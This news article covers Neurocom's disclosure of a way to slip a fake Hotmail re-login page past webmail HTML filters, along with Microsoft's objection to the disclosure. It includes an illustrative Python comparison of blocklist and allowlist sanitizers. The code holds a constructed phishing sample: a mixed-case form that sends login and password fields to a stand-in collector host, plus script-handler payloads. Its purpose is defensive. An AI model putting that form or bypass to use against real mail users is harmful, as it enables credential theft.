The exploit was described on the Bugtraq security mailing list Jan. 26 and was repaired within days, according to Microsoft's security response team. Microsoft on Friday said that security firm Neurocom had violated standard bug-reporting protocols by going public with the alleged vulnerability on Wednesday before contacting the company's security team.
"Our purpose was not to punish Microsoft at all," said Cyril Simonnet, an executive at Neurocom's Canada division. "Our purpose is just to find security breaches."
Neurocom's warning concerns what it describes as a Trojan horse, a malicious program that passes itself off as something else. In this case the "program" is nothing more than HTML (Hypertext Markup Language) carried in an e-mail message. Web-based mail services filter the HTML in incoming messages before displaying them; according to Neurocom, a message crafted to slip past Hotmail's filter could render a "perfect replica" of Hotmail's re-login page inside the recipient's mailbox, so that a user who re-entered a user name and password would hand them to the attacker rather than to Hotmail.
The company said that other sites providing Web-based e-mail may also be vulnerable to a similar attack.
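As an added illustration (not code from the article, from Neurocom or from Microsoft, none of whom published a technique), the following Python sketch contrasts two ways a Web-based mail service might filter the HTML in incoming messages: a blocklist that deletes form elements with a case-sensitive pattern, and an allowlist sanitizer that rebuilds the message from a short list of permitted tags and attributes. The sample message, the collector host collector.example.invalid and the tag-case bypass are all constructed for this example; the article does not say what omission Neurocom actually found in Hotmail's filter.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample input: an HTML e-mail body that imitates a webmail
# "session expired, please sign in again" page. The form posts to an
# attacker-controlled host; example.invalid is a reserved, non-resolvable
# domain. Nothing here is taken from the Neurocom advisory.
FAKE_RELOGIN_MAIL = """
<html><body>
<p>Your session has expired. Please sign in again to read this message.</p>
<FoRm action="http://collector.example.invalid/grab" method="post">
  <input type="text" name="login">
  <input type="password" name="passwd">
  <input type="submit" value="Sign In">
</FoRm>
<p onmouseover="alert(1)">Thank you for using our service.</p>
<p>Questions? <a href="javascript:alert(1)">Contact support</a></p>
</body></html>
"""

# Weak filter: a blocklist that removes <form>...</form>, but only when the
# tag is written in lower case. Browsers do not care about tag case, so an
# upper-case or mixed-case variant sails through (a generic blocklist
# weakness chosen for illustration, not the specific Hotmail omission).
FORM_BLOCKLIST = re.compile(r"<form\b.*?</form>", re.DOTALL)

def blocklist_filter(body: str) -> str:
    """Strip lower-case <form> blocks; leaves <FoRm> and inline handlers alone."""
    return FORM_BLOCKLIST.sub("", body)

# Hardened filter: rebuild the message from an allowlist. Anything not on the
# list is dropped; forms, scripts and similar containers lose their content
# too, so the input fields of a fake login page never reach the browser.
ALLOWED_TAGS = {"p", "b", "i", "br", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
DROP_WITH_CONTENT = {"form", "script", "style", "iframe", "object", "textarea"}
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")

class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside a dropped container element

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag names, so <FoRm> arrives here as "form".
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops every on* event handler, style, etc.
            if name == "href" and not (value or "").lower().startswith(SAFE_URL_SCHEMES):
                continue  # drops javascript: and other unexpected schemes
            kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag == "br":
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data))

def allowlist_sanitize(body: str) -> str:
    """Return a copy of body containing only allowlisted tags and attributes."""
    parser = AllowlistSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out)

def contains_credential_form(body: str) -> bool:
    """Case-insensitive check used to judge what each filter let through."""
    lowered = body.lower()
    return "<form" in lowered or 'type="password"' in lowered

if __name__ == "__main__":
    print("blocklist leaves a login form:", contains_credential_form(blocklist_filter(FAKE_RELOGIN_MAIL)))
    print("allowlist leaves a login form:", contains_credential_form(allowlist_sanitize(FAKE_RELOGIN_MAIL)))
    print(allowlist_sanitize(FAKE_RELOGIN_MAIL))
```

The design point is that a filter which enumerates what to remove has to anticipate every spelling a browser will accept, whereas a filter which enumerates what to keep fails closed: a tag or attribute nobody thought about simply disappears, which is the property a Web-based mail service needs before rendering untrusted HTML next to its own login forms.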
"It's a new instance of an old problem," said Elias Levy, chief technology officer for SecurityFocus.com. "It's another way to get past those filters, and it's probably not going to be the last."
Scott Culp, a program manager with Microsoft's Security Response Center, said he is not sure why Neurocom did not contact Microsoft before issuing its statement this week.
"Most people in the security industry follow a code of conduct in which they give the vendor notice of anything that they believe affects that vendor's product," he said.
However, Neurocom said in a statement that "the breaches in question come from omissions in the conception of these filters" and that the procedure to hack into an e-mail system "is relatively simple and requires very little technical knowledge."